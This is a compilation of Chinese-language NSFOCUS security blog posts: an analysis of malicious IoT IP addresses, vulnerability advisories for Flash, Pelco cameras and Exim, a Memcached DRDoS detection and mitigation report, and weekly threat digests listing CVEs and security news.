≫ Next: 【威胁通告】Adobe Flash Player 0-day漏洞（CVE-2018-4878）

≪ Previous: 【翻译】Oracle VirtualBox虚拟机逃逸漏洞分析

一、引言

近两年来，随着物联网相关技术的发展，几乎所有的家用电器都可以接入网络。智能化的应用给生活带来便利的同时，其副作用也随之而生。2016年，攻击者使用Mirai病毒用僵尸物联网设备让一个新闻网站的重要防火墙瘫痪之后，紧接着Dyn DNS service遭受到攻击，使得美国网络中流砥柱的公司大面积瘫痪，影响遍及数百万人群。而Mirai能够在识别物联网设备的同时令其感染病毒使之成为僵尸网络，进而集中控制物联网设备，发起分布式拒绝服务(DDoS)攻击，大量垃圾流量会渗透进入目标服务器，令服务器瘫痪。如今，受到威胁的不再只是电脑，网络摄像头和路由器也早已危机四伏，因此对物联网僵尸网络的识别及攻击预测，显得尤为重要。

通常情况下，可以从地址类型、网络位置、行为位置、风险类型等多个方面对某一IP进行描绘，IP维度上产生的信息，可以在很多业务场景中配合使用，如果对一些可疑的IP进行合理的描绘，输出相关的情报信息，从某些方面讲也可以为恶意攻击提供一定的预警能力。本文对物联网设备的IP进行了分析，主要从设备类型，开放服务，地域信息，攻击类型四个方面进行描绘，而且对这些维度进行分析，从中得出现有的恶意物联网IP的特征，并分析这些特征产生的可能原因。

图1物联网恶意IP可选的描绘维度

由2017年3月份绿盟科技创新中心物联网安全实验室和威胁情报实验室联合发表的《国内物联网资产的暴露情况分析》（http://t.cn/RaGywgI）中了解到，国内有十几种物联网设备存在数量较多的暴露情况，根据数量排序依次列出。

图2全球和国内物联网相关设备暴露情况

本文物联网资产数据全部来源于NTI（绿盟威胁情报中心），通过设备类型标签提取出物联网资产，将结果与历史攻击事件数据库中3000w IP进行撞库处理，最后共获得77860条恶意物联网资产记录，并将以上两个数据库的字段相结合做了如下相关分析。

二、相关分析

1.攻击类型分析

恶意的物联网资产以肉鸡为主，主要发动扫描和DDoS攻击。

我们对威胁IP历史攻击事件数据库中提取的恶意物联网资产的攻击类型字段进行统计，对于物联网资产而言，多数恶意的物联网设备都是被其他主机控制，组成僵尸网络进行攻击。如图 2.1 所示，除了其他攻击类型以外，Botnet（僵尸网络）总量占比最多，主要做Scanners（扫描器）和DDoS攻击。当初的Mirai事件就是黑客利用物联网设备的弱口令等安全漏洞，主要对网络监控设备实施入侵，并植入恶意软件构建僵尸网络进行DDoS攻击，致使被攻击的网络瘫痪的现象。

图3恶意物联网资产攻击类型数量分布

2.设备类型分析

恶意物联网设备中路由器和网络摄像头数量最多，占恶意总量90%以上

从上图可以看出恶意物联网IP中路由器和网络摄像头两种设备占总量的90%以上，是什么导致二者数量占比这么多呢？分析猜测有以下几点原因。首先，从图 4物联网资产暴露情况来看，恶意物联网设备类型的数量排名与暴露的数量的排名几乎相吻合，暴露的基数越大该设备被控制的数量可能就会越多；其次，因为多数人并不知道路由器，摄像头等物联网设备会被大规模植入恶意软件，所以此类设备很少有防护，而且具有常开的特性，操控者不担心会失去连接，这为攻击提供了很大的便利；最后也跟NTI的物联网资产数据有关，可能因为NTI对摄像头和路由器识别基数大，所以路由器和摄像头的恶意资产较多。以上等等均为推测，欲知确切原因，还需要更多数据进一步佐证。

图4恶意物联网设备类型分布情况

3.地域分布分析

全球恶意的物联网僵尸网络大多数分布在人口较多的发展中国家

印度的物联网僵尸网络数量最多，其次是中国和巴西，三个都是发展中国家，而且人口基数都很大，可能对路由器、摄像头等物联网设备需求也较多，并且一定程度上说明这些国家地区的人们对物联网安全意识相对薄弱。

图5恶意物联网设备全球分布示意图

图6恶意物联网设备国家数量分布

国内恶意的物联网僵尸网络主要分布在东南沿海地带，包括长三角，珠三角和京津冀经济带，香港地区是重灾区

如图 7 所示，恶意物联网设备主要分布在东南沿海和京津冀地带，产生这一现象可能是因为发达的经济带物联网设备的基数本身就大，所以这些地区的恶意物联网设备数量相对其他地区会多一些。当然这只是一种猜测，具体原因还需进一步的数据支撑和分析得出。由图 8 可知，香港地区的恶意物联网资产数量最多，且根据《国内物联网资产的暴露情况分析》显示，该地区的物联网设备暴露情况令人堪忧，看来暴露情况和恶意情况很可能正相关。

图7恶意物联网设备国内分布示意图

图8恶意物联网设备国内数量分布

4.开放服务分析

被控制的物联网设备大部分开放多个端口，开放最多的是WEB服务。

我们对恶意的物联网设备开放的服务数量进行了统计（端口开放可能包括历史数据），其中绝大部分开放端口为80，161，37777。通过分析恶意物联网资产协议和默认端口的对应关系，发现开放最多的协议为HTTP协议（图 10），也就是说在恶意的物联网设备中，开放最多的是WEB服务。

图9恶意物联网设备的端口分布

图10恶意物联网IP开放协议情况

三、写在最后

当然以上都是从客观的维度进行的分析，但是如果想找到恶意的物联网设备，还需根据具体的网络活动看其是否有恶意的行为，包括是否有与C&C主机连接行为和是否有攻击行为两个方面。如果能查到某物联网资产与已知的C&C主机连接，该物联网设备就有肉鸡的嫌疑，而该物联网资产有攻击相关流量，就可以进一步确定其为肉鸡。

分析了这么多，作为使用者我们该如何防止自己的物联网设备，不被他人攻击呢？这里结合我们的分析，简单的总结了一些建议：

（1）修改初始口令以及弱口令，加固用户名和密码的安全性；

（2）关闭不用的端口和服务，如FTP（21端口）、SSH（22端口）、Telnet（23端口）等，WEB服务尽可能的不暴露在公网；

（3）及时升级设备固件，修复漏洞。

当然如果你对以上技术建议并不是很care，或者没有精力做这些配置操作，但又担心家里的物联网设备遭受攻击，也许你需要一款具备安全能力的路由器。根据上文的分析安全路由器应至少具备以下能力：

扫描识别能力

对接入路由器内的设备进行定期扫描，识别其设备类型、开放服务、固件版本号等信息，提示使用者关闭不必要的端口和服务，对存在高危的固件版本提示升级。

恶意行为监测

对路由器内设备的访问连接行为进行识别，根据威胁情报等信息对设备连接的恶意的IP或URL进行告警或阻断，保护内网设备不被恶意主机连接控制。

随着家庭物联网设备种类的增多，其攻击面也必然会越来越广，相对于安全问题，消费者可能更会将精力放在产品的使用。可安全问题怎么办呢？所以如果在家庭的场景中配置一个安全路由器，让其来辅助消费者保护家中的智能设备的安全，似乎可以很好的解决以上冲突。随着技术的进步，人们对智能设备需求的增加，物联网设备的攻击面肯定不仅限于本文提到这些，所以关于安全路由器的能力可能还需进一步的挖掘和探讨。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/2017-mailip-analyse/

Tags: 分析报告, 恶意IP, 物联网, 绿盟科技

↧

【威胁通告】Adobe Flash Player 0-day漏洞（CVE-2018-4878）

February 2, 2018, 1:30 am

≫ Next: 【威胁通告】施耐德派尔高Sarix Professional网络摄像头漏洞

≪ Previous: 2017年国内恶意物联网IP分析

当地时间2月1日，北京时间2月2日，Adobe Flash Player被发现存在一个0-day漏洞（CVE-2018-4878），并且已被攻击者利用，该漏洞影响目前所有版本。攻击者可以诱使用户打开包含恶意Flash代码的Microsoft Office文档，网页，垃圾电子邮件等。恶意代码被认为是嵌入在MS Word文档中的Flash SWF文件中。

Adobe也发布通告表示CVE-2018-4878的漏洞利用已经存在，将在2月5日的补丁中修复该漏洞。

受影响的版本

Adobe Flash Player <= 28.0.0.137

不受影响的版本

目前版本均受影响，Adobe将于2月5日更新补丁。

解决方案

Adobe官方2月1日发布通告表示该漏洞将于2月5日的补丁中修复。在此之前用户可以考虑禁用或卸载Flash Player，或者使用受保护的视图打开Microsoft Office文档。

在补丁发布后，用户应该及时下载更新进行防护。

检查当前版本：

访问网站http://www.adobe.com/software/flash/about/，则会提示当前系统中的Adobe Flash Player版本。

更新安装新版本：

在官方发布新版本之后，访问https://get.adobe.com/flashplayer，取消可选程序安装（下图红框所示），点击右下角的立即安装即可进行更新。

参考链接：

https://helpx.adobe.com/security/products/flash-player/apsa18-01.html

声明

关于绿盟科技

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易，股票简称：绿盟科技，股票代码：300369。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/flash-0-day-cve-2018-4878/

Tags: 0-day漏洞, CVE-2018-4878, Flash, 威胁通告, 绿盟科技

↧

【威胁通告】施耐德派尔高Sarix Professional网络摄像头漏洞

March 2, 2018, 4:36 am

≫ Next: 【漏洞分析】Exim缓冲区溢出漏洞(CVE-2018-6789)

≪ Previous: 【威胁通告】Adobe Flash Player 0-day漏洞（CVE-2018-4878）

绿盟科技研究员在研究中发现施耐德派尔高（Pelco）Sarix Professional系列的网络摄像头中存在多个安全漏洞。

漏洞概括如下：

CVE编号	漏洞名称	严重程度
CVE-2018-7227	信息泄露漏洞	Medium
CVE-2018-7228	管理员权限验证绕过漏洞	High
CVE-2018-7229	管理员权限验证绕过漏洞	High
CVE-2018-7230	import.cgi XML实体注入漏洞	High
CVE-2018-7231	system.opkg.remove命令执行漏洞	Critical
CVE-2018-7232	network.ieee8021x.delete_certs命令执行漏洞	Critical
CVE-2018-7233	model_name或mac_address命令执行漏洞	Critical
CVE-2018-7234	ssldownload.cgi任意文件下载漏洞	High
CVE-2018-7235	system.download.sd_file命令执行漏洞	High
CVE-2018-7236	set_param远程开启SSL服务/验证绕过漏洞	High
CVE-2018-7237	system.delete.sd_file任意文件删除漏洞	Critical
CVE-2018-7238	基于web的GUI缓存区溢出漏洞	High

受影响的版本

Pelco Sarix Professional 固件版本 < 3.29.67

不受影响的版本

Pelco Sarix Professional 固件版本 3.29.67

解决方案

官方已经发布新版本3.29.67修复了删除漏洞，受影响的用户请及时下载更新至新版本进行防护。

下载地址：

https://www.pelco.com/search#keyword/v3.29.67/tab/documents

绿盟科技工控漏洞扫描系统（ICSScan）可对上述漏洞进行扫描检测，升级至最新版本即可。参考链接：http://update.nsfocus.com/update/listICSScan

声明

本安全公告仅用来描述可能存在的安全问题，绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，绿盟科技以及安全公告作者不为此承担任何责任。

关于绿盟科技

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易，股票简称：绿盟科技，股票代码：300369。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/sarix-professional-webcam-vulnerability/

Tags: 威胁通告, 施耐德派尔高, 绿盟科技

↧

【漏洞分析】Exim缓冲区溢出漏洞(CVE-2018-6789)

March 7, 2018, 7:32 pm

≫ Next: Memcached DRDoS攻击跟踪与排查措施

≪ Previous: 【威胁通告】施耐德派尔高Sarix Professional网络摄像头漏洞

Linux的邮件传输代理Exim被曝出存在一个漏洞（CVE-2018-6789）。该漏洞源于base64解码函数中的一个缓冲区溢出问题。常规下base64编码的字符串的长度为4的倍数，但是有可能在传输或者恶意构造的情况下导致长度不为4的倍数，致使长度计算错误。

一、漏洞概述

Linux的邮件传输代理Exim被曝出存在一个漏洞（CVE-2018-6789）。该漏洞源于base64解码函数中的一个缓冲区溢出问题。常规下base64编码的字符串的长度为4的倍数，但是有可能在传输或者恶意构造的情况下导致长度不为4的倍数，致使长度计算错误。通过该漏洞，攻击者可以绕过防护机制在受影响的应用程序上下文中执行任意代码。若攻击尝试失败仍可导致拒绝服务。

Exim在去年12月份就曾被爆出存在远程代码执行（CVE-2017-16943）与拒绝服务（CVE-2017-16944）漏洞，不法分子将会利用此应用漏洞发起大规模网络攻击，如传播挖矿病毒或用于勒索等，建议受影响企业及时升级到最新版本。

绿盟科技威胁情报中心（NTI）显示全球Exim用量超过百万级，该漏洞影响Exim发行以来所有版本，建议受影响的用户立即升级进行防护。

详情请参考如下链接：

http://www.openwall.com/lists/oss-security/2018/02/07/2

二、影响范围

受影响的版本

Exim version < 4.90.1

不受影响的版本

Exim version = 4.90.1

三、漏洞成因

问题出在b64decode函数中，该函数位于“src/src/base64.c”，在解码缓冲区长度时出现计算错误，关键代码截图如下：

标准的base64编码的字符串长度是4的整数倍，且每4位数据解码后会对应3位原始数据，假设编码后的字符串长度为len，则原始数据长度为(len/4)*3。

如上所示，Exim分配了一个长度为(len/4)*3+1+len%4的字节缓冲区来存储解码后的base64数据，如果是正常的base64编码数据，len%4（长度除4的余数）恒为零，但是如果输入无效的base64字符串且长度为4n+3，Exim则会在解码时多分配3个字节，这就会导致溢出。

四、漏洞检测

4.1 人工检测

使用命令“exim -bV”即可查看到当前exim版本，如果我们当前的版本在受影响列表中，即可确定存在漏洞。

五、防护方案

5.1 版本升级

目前官方已经发布最新版本4.90.1，建议及时进行更新，请访问如下链接进行下载：

ftp://mirror.easyname.at/exim-ftp/exim/exim4/

5.2 源码编译安装

找到并用编辑器打开源码文件“doc/doc-txt/ChangeLog”和“src/src/base64.c”，根据下面的截图，找到对应的行号修改代码，如下图所示：

详细信息请参考以下链接：

https://github.com/Exim/exim/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1

代码修改完成后重新编辑即可，最新版项目源代码也可直接到下面的链接中下载：

https://github.com/Exim/exim/archive/exim-4_90_1.zip

六、声明

七、关于绿盟科技

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易，股票简称：绿盟科技，股票代码：300369。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/exim-cve-2018-6789/

Tags: CVE-2018-6789, exim, 漏洞分析, 绿盟科技

↧

Memcached DRDoS攻击跟踪与排查措施

March 8, 2018, 10:04 pm

≫ Next: 【安全周报】绿盟科技互联网安全威胁周报 ——第201810周

≪ Previous: 【漏洞分析】Exim缓冲区溢出漏洞(CVE-2018-6789)

根据最新的数据统计，由Memcached造成的DDoS攻击流量峰值达到了1.7Tbps。绿盟科技与中国电信云堤共同对此事进行跟踪分析，短短5天内，全球就发生了79起利用Memcached协议的DDoS反射放大攻击，日攻击总流量最高达到419TBytes，攻击发生的频率从一天十几次到几百次，呈现爆发式增长。

一、攻击事件回顾

其中，针对我国境内的Memcached反射放大攻击就有68次，江苏、浙江两省被攻击频繁。针对我国境内的攻击，单次攻击最高攻击峰值达505Gbps。攻击持续时间最长的一次发生在3月1日，持续1.2小时，总攻击流量达103.8TBytes。

根据NTI（绿盟科技威胁情报中心）数据显示，全球有超过10万的Memcached服务器在互联网上开放，给予了攻击者极大的便利，请相关企业重点关注。

二、Memcached服务攻击利用

最新研究发现，任何可用于DRDoS攻击的暴露的Memcached服务器也可被用于数据窃取。

Memcached是一个高性能的分布式内存对象缓存系统，用于动态Web应用以减轻数据库负载。提高Web应用的响应速度，Memcached服务器通过开放11211端口供客户端进行访问，然而，一方面由于Memcached 主要作为缓存中间件，缺乏访问控制，另一方面也由于在编译安装时配置了不安全监听IP（如0.0.0.0），若Memcached服务暴露于互联网上且未设置iptables访问控制，攻击者则可轻易利用上述条件发起分布式拒绝服务放大攻击。

安全公司Corero的研究人员发现，对于未启用身份认证的Memcached服务，其本地网络或主机中缓存的用户数据，均可被攻击者通过诱骗共享的方式窃取。甚至攻击者还可修改数据并将其重新插入缓存中，而无需所有者知晓。

三、PoC影响简析

目前已经有两个漏洞利用的PoC公布，其中一个PoC使用python语言编写，借助Shodan搜索引擎获取可利用的Memcached服务器，进而利用并针对目标发起攻击。如下图所示。

另一PoC使用C语言编写，该漏洞利用程序的作者同步公开了受影响的Memcached服务器的IP列表，经过统计全球共有16,977个IP受影响，其中归属为中国的IP共4,221个，相关省份的分布图如下所示：

四、影响排查与攻击处置

4.1 Memcached DRDoS攻击缓解

Corero网络安全公司已公开了Memcached DRDoS攻击的缓解措施，被攻击者只要向攻击服务器发回“flush_all”命令即可缓解攻击，Corero的Memcached开发人员建议在循环中执行“flush_all \ r \ n”命令，将会缓解放大攻击。

4.2 Memcached服务风险排查

安全产品可针对Memcached的key-value配置进行检测，在Memcached系统被利用成为攻击源之前就进行拦截。检测流程如下：

1. 检测目的端口为11211的TCP或UDP报文，以确保是Memcached服务器。

2. 检测报文是否为set命令，如果是则执行（3），否则结束检测。

3. 检测set命令后面的bytes字段值（如下图中标注的1048501），是否超过设定的阈值，如果是，则可以怀疑该报文存在异常。

4. 检测到该类异常控制报文后，可有如下两种处理方式：

告警并监控。为了防止被误杀，建议同时监控该Memcached服务器后面的流量变化来进一步判断该服务器是否被用做了反射器。
直接丢弃。如果有足够的证据表明该记录是恶意添加的，直接丢弃可以保证服务器不被当做反射器。

自查举例：假设下图是公网的一台Memcached服务器上获取的数据。

通常情况下，多数value的大小都在64K以内，而最后一条的达到了将近1M，与其他记录有很明显的差别，基本上可以判断该记录存在问题，该服务器可能已经被利用。4.3 攻击流量清洗

面对如此大规模、大范围的DDoS攻击威胁，所有网络安全节点都应该加强防范，从攻击防护和外发清洗两方面入手，充分保障基础设施和业务流量的安全。针对此攻击，我们提供如下防护建议，技术建议详见报告：

http://7xkk1o.com1.z0.glb.clouddn.com/Memcached-DRDoS-report.pdf

运营商。运营商及IDC处于网络上游，拥有强大的带宽资源，是攻击最直接的受害者，也是防护的第一道屏障。运营商能够灵活控制路由策略和防护策略进行快速过滤。
企业用户。企业用户通常贴近服务终端，熟悉掌握自身业务流量特点，策略配置更加明确，灵活性强。

五、声明

绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告于商业目的。

六、关于绿盟科技

北京神州绿盟信息安全科技股份有限公司于2014年1月29日起在深圳证券交易所创业板上市交易，股票简称：绿盟科技，股票代码：300369。

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/memcached-drdos/

Tags: DDoS, DRDOS, memcached, 绿盟科技

↧

【安全周报】绿盟科技互联网安全威胁周报 ——第201810周

March 11, 2018, 8:19 pm

≫ Next: 绿盟科技互联网安全威胁周报 NSFOCUS-18-11

≪ Previous: Memcached DRDoS攻击跟踪与排查措施

绿盟科技网络安全威胁周报及月报系列，旨在简单而快速有效的传递安全威胁态势，呈现重点安全漏洞、安全事件、安全技术。截止到2018年3月9日，绿盟科技漏洞库已收录总条目达到39044条。本周新增漏洞记录38条，其中高危漏洞数量7条，中危漏洞数量18条，低危漏洞数量13条。

一. 互联网安全威胁态势

1.1 CVE统计

最近一周CVE公告总数与前期相比小幅上升

1.2 威胁信息回顾

标题：1.7Tb！Memcached DDoS攻击再刷新记录 Arbor称美ISP遭攻击
- 时间：2018.03.06
- 摘要：在GitHub遭受了大规模1.3 Tbps DDoS攻击后的四天，Arbor称美国某服务提供商遭遇了1.7 Tbps的Memcached DDoS攻击。另一方面全球还有10多万暴露在互联网上的Memcached服务器，基于这种攻击形式的DDoS攻击勒索已经露头.
- 链接：http://toutiao.secjia.com/memcached-ddos-newrecord
标题：NSA美国家安全局APT组织扫描团队TeDi曝光 NSA泄露资料分析新成果
- 时间：2018.03.08
- 摘要：当初“影子经纪人” 向互联网发布了一批被盗的NSA黑客工具时，大多数研究这些材料的专家们研究了其中最有力的工具，即用于安装恶意软件并接管机器的0Day漏洞。但是一组匈牙利安全研究人员最近发现了数据中的其他内容，一个隶属于美国家安全局NSA的神秘APT扫描团队TeDi曝光，NSA使用他们的脚本和扫描工具，来检测其感染机器上是否存在其他国家APT组织。
- 链接：http://toutiao.secjia.com/nsa-tedi-apt-scan
标题：OLYMPIC DESTROYER: A FALSE FLAG CONFUSION BOMB
- 时间：2018-03-08
- 摘要：CANCUN, Mexico – A postmortem of the Olympic Destroyer malware used in the PyeongChang Olympics attack reveals a deliberate attempt by adversaries to plant a false flags when it comes to attribution, according to researchers.
- 链接：https://threatpost.com/olympic-destroyer-a-false-flag-confusion-bomb/130262/
标题：PostgreSQL数据库管理系统爆出远程代码执行漏洞CVE-2018-1058 可DoS
- 时间：2018-03-06
- 摘要：近日，PostgreSQL爆出远程代码执行漏洞，CVE编号CVE-2018-1058，攻击者利用这个漏洞改为其他用户查询行为，可以利用这个漏洞在数据库超级用户的权限下执行代码，postgresql 版本9.3到 postgresql10受影响。
- 链接：http://toutiao.secjia.com/cve-2018-1058
标题：思科2018年度安全报告
- 时间：2018-03-06
- 摘要：在2018年，网络攻击的守护者红队应该做好迎接新的、能够自我繁殖和传播的基于网络的威胁。
- 链接：http://www.freebuf.com/articles/paper/164240.html
标题：美征信机构Equifax数据泄露案再爆240万美国公民个人信息被窃监管机构愤怒了
- 时间：2018.03.05
- 摘要：近日，美征信机构Equifax表示，在2017年Equifax数据泄露案中另外还有240万美国公民个人信息数据被盗，包括他们的姓名和一些驾照信息。这个发现将及2017Equifax数据泄露总数提升至约1.48亿人。该公司处理全球8.2亿多客户和9100万企业的数据。
- 链接：http://toutiao.secjia.com/equifax-databreach3
标题：4G LTE移动网络协议爆出新漏洞研究漏洞的LTEInspector工具已公开
- 时间：2018.03.06
- 摘要：在2017年，大家还在讨论LTE移动网络协议是安全的，但近日普渡大学和爱荷华大学的学者，已经在全球推动的4G LTE移动网络的核心协议中发现了新漏洞。攻击者利用这些漏洞，可以伪造身份给你发短信，并拦截你的短信内容包括手机短信验证码。研究员表示目前这些漏洞没有补丁，没有看到修复计划。
- 链接：http://toutiao.secjia.com/4g-lte-flaw
标题：win10小娜Cortana不安全无须解锁也可感染恶意软件微软已经确认漏洞
- 时间：2018.03.08
- 摘要：以色列独立安全研究人员Tal Be’ery 和Amichai Shulman发现，黑客可能会绕过Windows 10中的密码锁，利用Cortana在操作系统中实施的方式来入侵设备并部署恶意软件，要知道cortana很难彻底关闭它。微软已经确认了这个漏洞。
- 链接：http://toutiao.secjia.com/cortana-flaw
标题：Memcached DDoS放大攻击发现缓解开关该攻击还可窃取数据
- 时间：2018.03.08
- 摘要：安全公司Corero发布消息称，Memcached漏洞引发的DDoS放大攻击存在缓解攻击的kill switch，这种缓解技术依赖于攻击受害者向攻击服务器发回“flush_all”命令。另外报告该漏洞比最初认为影响范围更广泛。
- 链接：http://toutiao.secjia.com/memcached-ddos-killswitch
标题：微软代码完整性保护爆出CIGslip 0Day漏洞容易制作win10银行木马
- 时间：2018.03.09
- 摘要：恶意软件作者可以利用Windows代码完整性保护（CIG）安全机制中的安全绕过漏洞，将恶意未签名的代码注入受CIG保护的应用程序中，目前微软并不认为这是个安全问题，是个0Day漏洞。CIGslip漏洞可以绕过微软对杀软的限制，更可以用于制作银行木马。
- 链接：http://toutiao.secjia.com/windows-cigslip-bypass

（数据来源：绿盟科技威胁情报与网络安全实验室收集整理）

二. 漏洞研究

2.1 漏洞库统计

截止到2018年3月9日，绿盟科技漏洞库已收录总条目达到39044条。本周新增漏洞记录38条，其中高危漏洞数量7条，中危漏洞数量18条，低危漏洞数量13条。

Apache Tomcat安全绕过漏洞（CVE-2018-1305）
- 危险等级:高
- BID:103144
- cve编号:CVE-2018-1305
Apache Qpid Dispatch Router ‘router_core/connections.c’拒绝服务漏洞（CVE-2017-15699）
- 危险等级:中
- BID:103067
- cve编号:CVE-2017-15699
Cisco Jabber跨站脚本漏洞（CVE-2018-0201）
- 危险等级:中
- BID:103133
- cve编号:CVE-2018-0201
Apache Oozie 信息泄露漏洞（CVE-2017-15712）
- 危险等级:低
- BID:103102
- cve编号:CVE-2017-15712
多个思科产品信息泄露漏洞（CVE-2018-0140）
- 危险等级:中
- BID:103090
- cve编号:CVE-2018-0140
Apache Karaf LDAP注入漏洞（CVE-2016-8750）
- 危险等级:低
- BID:103098
- cve编号:CVE-2016-8750
Linux Kernel ‘drivers/block/floppy.c’ 安全限制绕过漏洞（CVE-2018-7273）
- 危险等级:低
- BID:103088
- cve编号:CVE-2018-7273
Adobe Shockwave Player远程内存破坏漏洞（CVE-2012-0771）
- 危险等级:高
- BID:103068
- cve编号:CVE-2012-0771
Apache JMeter 安全限制绕过漏洞（CVE-2018-1287）
- 危险等级:中
- BID:103068
- cve编号:CVE-2018-1287
Cisco Data Center Analytics Framework跨站脚本漏洞（CVE-2018-0145）
- 危险等级:中
- BID:103131
- cve编号:CVE-2018-0145
Cisco Unified Customer Voice Portal拒绝服务漏洞（CVE-2018-0139）
- 危险等级:高
- BID:103124
- cve编号:CVE-2018-0139
Cisco Data Center Analytics Framework跨站请求伪造漏洞（CVE-2018-0146）
- 危险等级:中
- BID:103122
- cve编号:CVE-2018-0146
Cisco Unified Communications Domain Manager远程代码执行漏洞（CVE-2018-0124）
- 危险等级:高
- BID:103114
- cve编号:CVE-2018-0124
Cisco Elastic Services Controller身份验证绕过漏洞（CVE-2018-0121）
- 危险等级:高
- BID:103113
- cve编号:CVE-2018-0121
Cisco Elastic Services Controller服务门户未授权访问漏洞（CVE-2018-0130）
- 危险等级:高
- BID:103116
- cve编号:CVE-2018-0130
Wireshark IPMI Dissector ‘epan/dissectors/packet-ipmi-picmg.c’拒绝服务漏洞（CVE-2018-7417）
- 危险等级:低
- BID:103156
- cve编号:CVE-2018-7417
Cisco Prime Collaboration Provisioning Tool跨站脚本漏洞（CVE-2018-0205）
- 危险等级:中
- BID:103145
- cve编号:CVE-2018-0205
Apache Tomcat安全限制绕过漏洞（CVE-2018-1304）
- 危险等级:中
- BID:103170
- cve编号:CVE-2018-1304
Cisco Prime Service Catalog跨站脚本漏洞（CVE-2018-0200）
- 危险等级:中
- BID:103128
- cve编号:CVE-2018-0200
PHP 栈缓冲区溢出漏洞（CVE-2018-7584）
- 危险等级:中
- BID:103204
- cve编号:CVE-2018-7584
Apache Geode远程代码执行漏洞（CVE-2017-15693）
- 危险等级:低
- BID:103206
- cve编号:CVE-2017-15693
Apache Geode远程代码执行漏洞（CVE-2017-15692）
- 危险等级:低
- BID:103205
- cve编号:CVE-2017-15692
Apache CloudStack信息泄露漏洞（CVE-2013-4317）
- 危险等级:中
- cve编号:CVE-2013-4317
Linux Kernel ‘net/rds/rdma.c’ 拒绝服务漏洞（CVE-2018-7492）
- 危险等级:低
- BID:103185
- cve编号:CVE-2018-7492
Qemu 任意代码执行漏洞（CVE-2018-7550）
- 危险等级:低
- BID:103181
- cve编号:CVE-2018-7550
Linux Kernel ‘drivers/md/dm.c’本地拒绝服务漏洞（CVE-2017-18203）
- 危险等级:低
- BID:103184
- cve编号:CVE-2017-18203
NTP拒绝服务漏洞（CVE-2018-7184）
- 危险等级:中
- BID:103192
- cve编号:CVE-2018-7184
GNU libcdio本地拒绝服务漏洞（CVE-2017-18201）
- 危险等级:低
- BID:103190
- cve编号:CVE-2017-18201
ISC DHCP远程拒绝服务漏洞（CVE-2018-5733）
- 危险等级:低
- BID:103188
- cve编号:CVE-2018-5733
ISC DHCP远程缓冲区溢出漏洞（CVE-2018-5732）
- 危险等级:低
- BID:103187
- cve编号:CVE-2018-5732
Citrix NetScaler ADC and NetScaler Gateway身份验证绕过漏洞（CVE-2018-5314）
- 危险等级:低
- BID:103186
- cve编号:CVE-2018-5314
NTP信息泄露漏洞（CVE-2018-7182）
- 危险等级:中
- BID:103191
- cve编号:CVE-2018-7182
Cisco Prime Collaboration Provisioning硬编码凭证本地安全限制绕过漏洞
- 危险等级:高
- BID:103329
- cve编号:CVE-2018-0141
Cisco 550X Series Stackable Managed Switches SNMP拒绝服务漏洞
- 危险等级:中
- cve编号:CVE-2018-0209
Cisco Registered Envelope Service 跨站脚本漏洞
- 危险等级:中
- cve编号:CVE-2018-0208
Cisco StarOS CLI命令注入漏洞（CVE-2018-0224）
- 危险等级:中
- cve编号:CVE-2018-0224
Cisco StarOS CLI命令注入漏洞（CVE-2018-0217）
- 危险等级:中
- cve编号:CVE-2018-0217
Cisco Security Manager DesktopServlet跨站脚本漏洞
- 危险等级:中
- cve编号:CVE-2018-0223

（数据来源：绿盟科技安全研究部&产品规则组）

2.2 焦点漏洞

焦点漏洞
- Exim缓冲区溢出漏洞
- NSFOCUS ID
  - 39006
- CVE ID
  - CVE-2018-6789
- 受影响版本
  - Exim versions < 4.90.1
- 漏洞点评
  - Exim是一个邮件传输代理服务器软件。Exim 4.90.1之前版本，base64解码函数存在缓冲区溢出漏洞。常规下base64编码的字符串的长度为4的倍数，但是有可能在传输或者恶意构造的情况下导致长度不为4的倍数，致使长度计算错误。通过该漏洞，攻击者可以绕过防护机制在受影响的应用程序上下文中执行任意代码。目前官方已经发布最新版本4.90.1，建议及时进行更新。

【漏洞分析】Exim缓冲区溢出漏洞(CVE-2018-6789)

（数据来源：绿盟科技安全研究部&产品规则组）

文章来源：绿盟科技博客

原文地址：http://blog.nsfocus.net/nsfocus-201810/

Tags: Exim缓冲区漏洞, memcached ddos, 安全周报, 绿盟科技, 绿盟科技漏洞库

↧

绿盟科技互联网安全威胁周报 NSFOCUS-18-11

March 18, 2018, 7:39 pm

≫ Next: 【安全报告】2017物联网安全年报

≪ Previous: 【安全周报】绿盟科技互联网安全威胁周报 ——第201810周

绿盟科技漏洞库本周新增漏洞记录91条，其中高危漏洞数量14条，中危漏洞数量42条，低危漏洞数量35条。本次周报建议大家关注微软凭据安全支持提供协议(CredSSP)漏洞(CVE-2018-0886)，攻击者可以通过中间人攻击（man-in-the-middle）来利用该漏洞,微软已经在3月份更新中解决了这个问题。建议用户及时更新。

一、焦点漏洞

微软凭据安全支持提供协议(CredSSP)漏洞

NSFOCUS ID 39088
CVE ID CVE-2018-0886

受影响版本

未安装3月份安全更新的Windows版本

漏洞点评

微软的凭据安全支持提供协议（CredSSP）被曝存在一个漏洞(CVE-2018-0886)，该漏洞源于CredSSP中的一处加密逻辑问题，当客户端计算机和服务器通过远程桌面协议（RDP）和Windows远程管理（WinRM）连接协议彼此验证时，攻击者可以通过中间人攻击（man-in-the-middle）来利用该漏洞。微软已经在3月份更新中解决了这个问题。用户应立即通过Windows自动更新服务来下载更新安全补丁进行防护。

（数据来源：绿盟科技安全研究部&产品规则组）

二、互联网安全威胁态势

2.1 CVE统计

最近一周CVE公告总数与前期相比大幅上升。

2.2 威胁信息回顾

标题：美国土安全部被批了,来看DHS安全评估报告
- 时间：2018.03.12
- 摘要：美监察长办公室（OIG）发布了“对2017年财年DHS信息安全计划的评估”报告。简而言之，美国国土安全部（DHS）运行的软件过时了，没有修补关键漏洞，甚至包括WannaCry 勒索软件的漏洞。监察办提出了五项建议，即DHS首席信息安全官同意在2018年9月20日之前完成。
